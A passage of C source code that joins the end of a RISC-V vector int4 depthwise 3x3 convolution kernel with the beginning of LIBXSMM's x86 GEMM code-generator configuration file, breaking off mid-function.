int8_t *output_tran_buf = (int8_t *)csi_mem_alloc(out_h * out_w * out_c * sizeof(int8_t));
csi_nn_rvv_int4_trans_int8(kernel_data, kernel_tran_buf, 9 * in_c);
in_h = in_h + params->pad_top + params->pad_down;
in_w = in_w + params->pad_left + params->pad_right;
#pragma omp parallel for num_threads(1)
for (int c = 0; c < in_c; c++) {
int8_t *outptr0 = output_tran_buf + c;
int8_t *outptr1 = outptr0 + out_w * out_c;
// please use fuse_zp2bias option in hhb, thus bias_data wont be NULL
int32_t bias0 = bias_data[c];
int8_t *img0 = input_padd_buf + c;
int8_t *r0 = img0;
int8_t *r1 = r0 + in_w * in_c;
int8_t *r2 = r1 + in_w * in_c;
int8_t *r3 = r2 + in_w * in_c;
const int8_t *kernel0 = kernel_tran_buf + c;
int8_t k00 = kernel0[0];
int8_t k01 = kernel0[1 * in_c];
int8_t k02 = kernel0[2 * in_c];
int8_t k10 = kernel0[3 * in_c];
int8_t k11 = kernel0[4 * in_c];
int8_t k12 = kernel0[5 * in_c];
int8_t k20 = kernel0[6 * in_c];
int8_t k21 = kernel0[7 * in_c];
int8_t k22 = kernel0[8 * in_c];
int vl;
int h = 0;
// h2 loop
for (; h + 1 < out_h; h += 2) {
int w = out_w;
// h2w8 loop
while (w > 0) {
vl = vsetvl_e32m4(w);
vint32m4_t _acc0 = vmv_v_x_i32m4(bias0, vl);
vint32m4_t _acc1 = vmv_v_x_i32m4(bias0, vl);
vint8m1_t _r0_0_7 = vlse8_v_i8m1(r0, in_c * sizeof(int8_t), vl);
vint8m1_t _r0_1_8 = vlse8_v_i8m1(r0 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r0_2_9 = vlse8_v_i8m1(r0 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_0_7 = vlse8_v_i8m1(r1, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_1_8 = vlse8_v_i8m1(r1 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_2_9 = vlse8_v_i8m1(r1 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_0_7 = vlse8_v_i8m1(r2, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_1_8 = vlse8_v_i8m1(r2 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_2_9 = vlse8_v_i8m1(r2 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r3_0_7 = vlse8_v_i8m1(r3, in_c * sizeof(int8_t), vl);
vint8m1_t _r3_1_8 = vlse8_v_i8m1(r3 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r3_2_9 = vlse8_v_i8m1(r3 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint16m2_t _r0_0_7_w = vwadd_vx_i16m2(_r0_0_7, 0, vl); // widden 8->16
vint16m2_t _r0_1_8_w = vwadd_vx_i16m2(_r0_1_8, 0, vl);
vint16m2_t _r0_2_9_w = vwadd_vx_i16m2(_r0_2_9, 0, vl);
vint16m2_t _r1_0_7_w = vwadd_vx_i16m2(_r1_0_7, 0, vl);
vint16m2_t _r1_1_8_w = vwadd_vx_i16m2(_r1_1_8, 0, vl);
vint16m2_t _r1_2_9_w = vwadd_vx_i16m2(_r1_2_9, 0, vl);
vint16m2_t _r2_0_7_w = vwadd_vx_i16m2(_r2_0_7, 0, vl);
vint16m2_t _r2_1_8_w = vwadd_vx_i16m2(_r2_1_8, 0, vl);
vint16m2_t _r2_2_9_w = vwadd_vx_i16m2(_r2_2_9, 0, vl);
vint16m2_t _r3_0_7_w = vwadd_vx_i16m2(_r3_0_7, 0, vl);
vint16m2_t _r3_1_8_w = vwadd_vx_i16m2(_r3_1_8, 0, vl);
vint16m2_t _r3_2_9_w = vwadd_vx_i16m2(_r3_2_9, 0, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k00, _r0_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k01, _r0_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k02, _r0_2_9_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k00, _r1_0_7_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k01, _r1_1_8_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k02, _r1_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k10, _r1_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k11, _r1_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k12, _r1_2_9_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k10, _r2_0_7_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k11, _r2_1_8_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k12, _r2_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k20, _r2_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k21, _r2_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k22, _r2_2_9_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k20, _r3_0_7_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k21, _r3_1_8_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k22, _r3_2_9_w, vl);
vint8m1_t _res0, _res1;
if (kernel->quant_channel > 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[c].multiplier,
kernel->qinfo[c].shift, output->qinfo->zero_point, vl);
_res1 = requantize_m4(_acc1, kernel->qinfo[c].multiplier,
kernel->qinfo[c].shift, output->qinfo->zero_point, vl);
} else if (kernel->quant_channel == 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[0].multiplier,
kernel->qinfo[0].shift, output->qinfo->zero_point, vl);
_res1 = requantize_m4(_acc1, kernel->qinfo[0].multiplier,
kernel->qinfo[0].shift, output->qinfo->zero_point, vl);
}
vsse8_v_i8m1(outptr0, in_c * sizeof(int8_t), _res0, vl);
vsse8_v_i8m1(outptr1, in_c * sizeof(int8_t), _res1, vl);
r0 += vl * in_c;
r1 += vl * in_c;
r2 += vl * in_c;
r3 += vl * in_c;
outptr0 += vl * in_c;
outptr1 += vl * in_c;
w -= vl;
}
r0 += (2 + in_w) * in_c;
r1 += (2 + in_w) * in_c;
r2 += (2 + in_w) * in_c;
r3 += (2 + in_w) * in_c;
outptr0 += out_w * in_c;
outptr1 += out_w * in_c;
}
for (; h < out_h; h++) {
int w = out_w;
// h2w8 loop
while (w > 0) {
vl = vsetvl_e32m4(w);
vint32m4_t _acc0 = vmv_v_x_i32m4(bias0, vl);
vint8m1_t _r0_0_7 = vlse8_v_i8m1(r0, in_c * sizeof(int8_t), vl);
vint8m1_t _r0_1_8 = vlse8_v_i8m1(r0 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r0_2_9 = vlse8_v_i8m1(r0 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_0_7 = vlse8_v_i8m1(r1, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_1_8 = vlse8_v_i8m1(r1 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_2_9 = vlse8_v_i8m1(r1 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_0_7 = vlse8_v_i8m1(r2, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_1_8 = vlse8_v_i8m1(r2 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_2_9 = vlse8_v_i8m1(r2 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint16m2_t _r0_0_7_w = vwadd_vx_i16m2(_r0_0_7, 0, vl); // widden 8->16
vint16m2_t _r0_1_8_w = vwadd_vx_i16m2(_r0_1_8, 0, vl);
vint16m2_t _r0_2_9_w = vwadd_vx_i16m2(_r0_2_9, 0, vl);
vint16m2_t _r1_0_7_w = vwadd_vx_i16m2(_r1_0_7, 0, vl);
vint16m2_t _r1_1_8_w = vwadd_vx_i16m2(_r1_1_8, 0, vl);
vint16m2_t _r1_2_9_w = vwadd_vx_i16m2(_r1_2_9, 0, vl);
vint16m2_t _r2_0_7_w = vwadd_vx_i16m2(_r2_0_7, 0, vl);
vint16m2_t _r2_1_8_w = vwadd_vx_i16m2(_r2_1_8, 0, vl);
vint16m2_t _r2_2_9_w = vwadd_vx_i16m2(_r2_2_9, 0, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k00, _r0_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k01, _r0_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k02, _r0_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k10, _r1_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k11, _r1_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k12, _r1_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k20, _r2_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k21, _r2_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k22, _r2_2_9_w, vl);
vint8m1_t _res0;
if (kernel->quant_channel > 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[c].multiplier,
kernel->qinfo[c].shift, output->qinfo->zero_point, vl);
} else if (kernel->quant_channel == 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[0].multiplier,
kernel->qinfo[0].shift, output->qinfo->zero_point, vl);
}
vsse8_v_i8m1(outptr0, in_c * sizeof(int8_t), _res0, vl);
r0 += vl * in_c;
r1 += vl * in_c;
r2 += vl * in_c;
outptr0 += vl * in_c;
w -= vl;
}
}
}
csi_nn_rvv_int8_to_int4(output_tran_buf, output_data, out_h * out_w * in_c);
csi_mem_free(input_padd_buf);
csi_mem_free(kernel_tran_buf);
csi_mem_free(output_tran_buf);
return CSINN_TRUE;
}
int csi_nn_rvv_dwconv3x3s2_int4(struct csi_tensor *input, struct csi_tensor *output,
struct csi_tensor *kernel, struct csi_tensor *bias,
struct conv2d_params *params)
{
int8_t *input_data = (int8_t *)input->data;
int8_t *output_data = (int8_t *)output->data;
int8_t *kernel_data = (int8_t *)kernel->data;
int32_t *bias_data = (int32_t *)bias->data;
int32_t batch = input->dim[0];
int32_t in_h = input->dim[1];
int32_t in_w = input->dim[2];
int32_t in_c = input->dim[3];
int32_t out_h = output->dim[1];
int32_t out_w = output->dim[2];
int32_t out_c = output->dim[3];
int8_t *input_padd_buf = (int8_t *)csi_mem_alloc((in_h + params->pad_top + params->pad_down) *
(in_w + params->pad_left + params->pad_right) *
in_c * sizeof(int8_t));
csi_nn_rvv_pad_input_int4_trans_int8(
input_data, input_padd_buf, in_c, in_h, in_w, in_h + params->pad_top + params->pad_down,
in_w + params->pad_left + params->pad_right, params->pad_top, params->pad_left,
input->qinfo->zero_point);
int8_t *kernel_tran_buf = (int8_t *)csi_mem_alloc(9 * in_c * sizeof(int8_t));
int8_t *output_tran_buf = (int8_t *)csi_mem_alloc(out_h * out_w * out_c * sizeof(int8_t));
csi_nn_rvv_int4_trans_int8(kernel_data, kernel_tran_buf, 9 * in_c);
in_h = in_h + params->pad_top + params->pad_down;
in_w = in_w + params->pad_left + params->pad_right;
int tailstep = (in_w - 2 * out_w + in_w) * in_c;
#pragma omp parallel for num_threads(1)
for (int c = 0; c < in_c; c++) {
int8_t *outptr0 = output_tran_buf + c;
int32_t bias0 = bias_data[c];
int8_t *img0 = input_padd_buf + c;
int8_t *r0 = img0;
int8_t *r1 = r0 + in_w * in_c;
int8_t *r2 = r1 + in_w * in_c;
const int8_t *kernel0 = kernel_tran_buf + c;
int8_t k00 = kernel0[0];
int8_t k01 = kernel0[1 * in_c];
int8_t k02 = kernel0[2 * in_c];
int8_t k10 = kernel0[3 * in_c];
int8_t k11 = kernel0[4 * in_c];
int8_t k12 = kernel0[5 * in_c];
int8_t k20 = kernel0[6 * in_c];
int8_t k21 = kernel0[7 * in_c];
int8_t k22 = kernel0[8 * in_c];
int vl;
for (int h = 0; h < out_h; h++) {
int w = out_w;
while (w > 0) {
vl = vsetvl_e32m4(w);
vint32m4_t _acc0 = vmv_v_x_i32m4(bias0, vl);
vint8m1_t _r0_0_7 = vlse8_v_i8m1(r0, 2 * in_c * sizeof(int8_t), vl);
r0 += in_c;
vint8m1_t _r0_1_8 = vlse8_v_i8m1(r0, 2 * in_c * sizeof(int8_t), vl);
r0 += in_c;
vint8m1_t _r0_2_9 = vlse8_v_i8m1(r0, 2 * in_c * sizeof(int8_t), vl);
r0 += (vl - 1) * 2 * in_c;
vint8m1_t _r1_0_7 = vlse8_v_i8m1(r1, 2 * in_c * sizeof(int8_t), vl);
r1 += in_c;
vint8m1_t _r1_1_8 = vlse8_v_i8m1(r1, 2 * in_c * sizeof(int8_t), vl);
r1 += in_c;
vint8m1_t _r1_2_9 = vlse8_v_i8m1(r1, 2 * in_c * sizeof(int8_t), vl);
r1 += (vl - 1) * 2 * in_c;
vint8m1_t _r2_0_7 = vlse8_v_i8m1(r2, 2 * in_c * sizeof(int8_t), vl);
r2 += in_c;
vint8m1_t _r2_1_8 = vlse8_v_i8m1(r2, 2 * in_c * sizeof(int8_t), vl);
r2 += in_c;
vint8m1_t _r2_2_9 = vlse8_v_i8m1(r2, 2 * in_c * sizeof(int8_t), vl);
r2 += (vl - 1) * 2 * in_c;
vint16m2_t _r0_0_7_w = vwadd_vx_i16m2(_r0_0_7, 0, vl); // widden 8->16
vint16m2_t _r0_1_8_w = vwadd_vx_i16m2(_r0_1_8, 0, vl);
vint16m2_t _r0_2_9_w = vwadd_vx_i16m2(_r0_2_9, 0, vl);
vint16m2_t _r1_0_7_w = vwadd_vx_i16m2(_r1_0_7, 0, vl);
vint16m2_t _r1_1_8_w = vwadd_vx_i16m2(_r1_1_8, 0, vl);
vint16m2_t _r1_2_9_w = vwadd_vx_i16m2(_r1_2_9, 0, vl);
vint16m2_t _r2_0_7_w = vwadd_vx_i16m2(_r2_0_7, 0, vl);
vint16m2_t _r2_1_8_w = vwadd_vx_i16m2(_r2_1_8, 0, vl);
vint16m2_t _r2_2_9_w = vwadd_vx_i16m2(_r2_2_9, 0, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k00, _r0_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k01, _r0_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k02, _r0_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k10, _r1_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k11, _r1_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k12, _r1_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k20, _r2_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k21, _r2_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k22, _r2_2_9_w, vl);
vint8m1_t _res0;
if (kernel->quant_channel > 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[c].multiplier,
kernel->qinfo[c].shift, output->qinfo->zero_point, vl);
} else if (kernel->quant_channel == 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[0].multiplier,
kernel->qinfo[0].shift, output->qinfo->zero_point, vl);
}
vsse8_v_i8m1(outptr0, in_c * sizeof(int8_t), _res0, vl);
outptr0 += vl * in_c;
w -= vl;
}
r0 += tailstep;
r1 += tailstep;
r2 += tailstep;
}
}
csi_nn_rvv_int8_to_int4(output_tran_buf, output_data, out_h * out_w * in_c);
csi_mem_free(input_padd_buf);
csi_mem_free(kernel_tran_buf);
csi_mem_free(output_tran_buf);
return CSINN_TRUE;
} |
generator_gemm_common.c | /******************************************************************************
* Copyright (c) Intel Corporation - All rights reserved. *
* This file is part of the LIBXSMM library. *
* *
* For information on the license, see the LICENSE file. *
* Further information: https://github.com/hfp/libxsmm/ *
* SPDX-License-Identifier: BSD-3-Clause *
******************************************************************************/
/* Alexander Heinecke (Intel Corp.)
******************************************************************************/
#include "generator_gemm_common.h"
#include "generator_common.h"
#include "generator_x86_instructions.h"
#include "libxsmm_main.h"
LIBXSMM_API_INTERN
int libxsmm_generator_gemm_get_rbp_relative_offset( libxsmm_gemm_stack_var stack_var ) {
/* The stack at exit of setup looks like this:
*
* 10th param (if applicable) <-- RBP+40
* 9th param (if applicable) <-- RBP+32
* 8th param (if applicable) <-- RBP+24
* 7th param (if applicable) <-- RBP+16
* Return address <-- RBP+8
* Entry/saved RBP <-- RBP
* prefetch A ptr <-- RBP-8
* prefetch B ptr <-- RBP-16
* Offset A array ptr <-- RBP-24
* Offset B array ptr <-- RBP-32
* Int8 scaling factor <-- RBP-40
* GEMM_scratch ptr in stack (to be filled) <-- RBP-48
* Eltwise bias ptr <-- RBP-56
* Eltwise output_ptr <-- RBP-64
* Eltwise buf1_ptr <-- RBP-72
* Eltwise buf2_ptr <-- RBP-80
*
* */
switch ( stack_var ) {
case LIBXSMM_GEMM_STACK_VAR_NONE:
return 0;
case LIBXSMM_GEMM_STACK_VAR_PFA_PTR:
return -8;
case LIBXSMM_GEMM_STACK_VAR_PFB_PTR:
return -16;
case LIBXSMM_GEMM_STACK_VAR_A_OFFS_BRGEMM_PTR:
return -24;
case LIBXSMM_GEMM_STACK_VAR_B_OFFS_BRGEMM_PTR:
return -32;
case LIBXSMM_GEMM_STACK_VAR_INT8_SCF:
return -40;
case LIBXSMM_GEMM_STACK_VAR_GEMM_SCRATCH_PTR:
return -48;
case LIBXSMM_GEMM_STACK_VAR_ELT_BIAS_PTR:
return -56;
case LIBXSMM_GEMM_STACK_VAR_ELT_OUTPUT_PTR:
return -64;
case LIBXSMM_GEMM_STACK_VAR_ELT_RELU_BITMASK_PTR:
return -72;
case LIBXSMM_GEMM_STACK_VAR_ELT_BUF1:
return -72;
case LIBXSMM_GEMM_STACK_VAR_ELT_BUF2:
return -80;
case LIBXSMM_GEMM_STACK_VAR_TRANS_EXT_BUF_B:
return -72;
case LIBXSMM_GEMM_STACK_VAR_TRANS_EXT_BUF_C:
return -80;
case LIBXSMM_GEMM_STACK_VAR_ELT_BITMAP_PTR:
return -72;
case LIBXSMM_GEMM_STACK_VAR_ELT_DECOMPRESS_BUF:
return -80;
case LIBXSMM_GEMM_STACK_VAR_ARG_7:
return 16;
case LIBXSMM_GEMM_STACK_VAR_ARG_8:
return 24;
case LIBXSMM_GEMM_STACK_VAR_ARG_9:
return 32;
case LIBXSMM_GEMM_STACK_VAR_ARG_10:
return 40;
default:
return 0;
}
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_getval_stack_var( libxsmm_generated_code* io_generated_code,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
libxsmm_gemm_stack_var stack_var,
unsigned int i_gp_reg ) {
int offset = libxsmm_generator_gemm_get_rbp_relative_offset(stack_var);
/* make sure we requested a legal stack var */
if (offset == 0) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_GENERAL );
return;
}
libxsmm_x86_instruction_alu_mem( io_generated_code, i_micro_kernel_config->alu_mov_instruction, LIBXSMM_X86_GP_REG_RBP, LIBXSMM_X86_GP_REG_UNDEF, 0, offset, i_gp_reg, 0 );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_setval_stack_var( libxsmm_generated_code* io_generated_code,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
libxsmm_gemm_stack_var stack_var,
unsigned int i_gp_reg ) {
int offset = libxsmm_generator_gemm_get_rbp_relative_offset(stack_var);
/* make sure we requested to set a legal stack var */
if (offset >= 0) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_GENERAL );
return;
}
libxsmm_x86_instruction_alu_mem( io_generated_code, i_micro_kernel_config->alu_mov_instruction, LIBXSMM_X86_GP_REG_RBP, LIBXSMM_X86_GP_REG_UNDEF, 0, offset, i_gp_reg, 1 );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_init_micro_kernel_config_fullvector( libxsmm_micro_kernel_config* io_micro_kernel_config,
const unsigned int i_arch,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_use_masking_a_c ) {
memset(io_micro_kernel_config, 0, sizeof(*io_micro_kernel_config)); /* avoid warning "maybe used uninitialized" */
if ( (i_arch < LIBXSMM_X86_SSE3) || (i_arch > LIBXSMM_X86_ALLFEAT) ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_GENERIC;
io_micro_kernel_config->vector_reg_count = 0;
io_micro_kernel_config->use_masking_a_c = 0;
io_micro_kernel_config->vector_name = 'a';
io_micro_kernel_config->vector_length = 0;
io_micro_kernel_config->datatype_size = 0;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
} else if ( i_arch <= LIBXSMM_X86_SSE4 ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_SSE3;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'x';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 2;
io_micro_kernel_config->datatype_size = 8;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVAPD;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVUPD;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_MOVDDUP;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVAPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVAPD;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVUPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVUPD;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_XORPD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_MULPD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_ADDPD;
} else {
io_micro_kernel_config->vector_length = 4;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_SHUFPS;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVAPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVAPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_XORPS;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_MULPS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_ADDPS;
}
} else if ( i_arch <= LIBXSMM_X86_AVX2 ) {
io_micro_kernel_config->instruction_set = i_arch;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'y';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 4;
io_micro_kernel_config->datatype_size = 8;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPD;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPD;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULPD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPD;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPD;
}
} else {
io_micro_kernel_config->vector_length = 8;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPS;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULPS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
}
}
} else if ( i_arch <= LIBXSMM_X86_ALLFEAT ) {
io_micro_kernel_config->instruction_set = i_arch;
io_micro_kernel_config->vector_reg_count = 32;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'z';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 8;
io_micro_kernel_config->datatype_size = 8;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPD;
} else {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPD;
